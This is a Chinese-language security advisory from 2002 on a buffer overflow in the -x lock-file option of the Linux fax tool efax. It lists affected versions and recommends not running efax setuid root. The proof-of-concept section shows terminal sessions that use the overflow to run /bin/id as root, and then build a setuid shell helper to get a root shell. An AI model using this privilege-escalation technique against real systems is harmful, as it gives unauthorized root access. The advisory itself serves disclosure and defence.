EFax UUCP-style Lock 文件命令行选项存在缓冲溢出

发布时间：2002-01-19
更新时间：2002-01-19
严重程度：高
威胁程度：权限提升
错误类型：边界检查错误
利用方式：服务器模式

BUGTRAQ ID：3894

受影响系统

efax efax 0.8a
   - RedHat Linux 6.0 i386
   - TurboLinux Turbo Linux 6.0
efax efax 0.9a
efax efax 0.9
   + MandrakeSoft Linux Mandrake 8.1
   + RedHat Linux 7.0
   + RedHat Linux 7.1
   + RedHat Linux 7.2

详细描述
efax是一款LINUX下的传真工具。

其中在对uucp-style锁文件选项没有很好的进行边界检查，-x开关会产生缓冲溢出而导致任意命令可执行。

测试代码
Running /bin/id:

hdm@sliver> efax -x $EX
efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 43:10 compiled Aug 16 2001 10:23:23
efax: 43:10 Error: can't open pre-lock file <nops>ë^)ÀˆF‰F
                     ‰°
                       ‡óS
                            Í€)À@Í€èÞÿÿÿ/bin/idAÿ¿/TMP..08795: File name too long
uid=500(hdm) gid=100(users) euid=0(root) groups=100(users)

Getting a root shell:

hdm@sliver > echo 'void main(void){setuid(0);system("/bin/sh");}' > /tmp/ex.c
hdm@sliver > gcc -o /tmp/ex /tmp/ex.c
/tmp/ex.c: In function `main':
/tmp/ex.c:1: warning: return type of `main' is not `int'
hdm@sliver > export EX=`perl genshell.pl 1029 $ADDR`
shell code is: 43 bytes
hdm@sliver > efax -x $EX
efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 46:21 compiled Aug 16 2001 10:23:23
efax: 46:21 Error: can't open pre-lock file <nops>ë^)ÀˆF‰F
                     ‰°
                       ‡óS
                            Í€)À@Í€èÞÿÿÿ/tmp/exAÿ¿/TMP..08846: File name too long
sh-2.04#

解决方案
保证efax不以setuid root

相关信息
参考：http://www.securityfocus.com/archive/1/250837

最近严重漏洞

EFax UUCP-style Lock 文件命令行选项存在缓冲溢出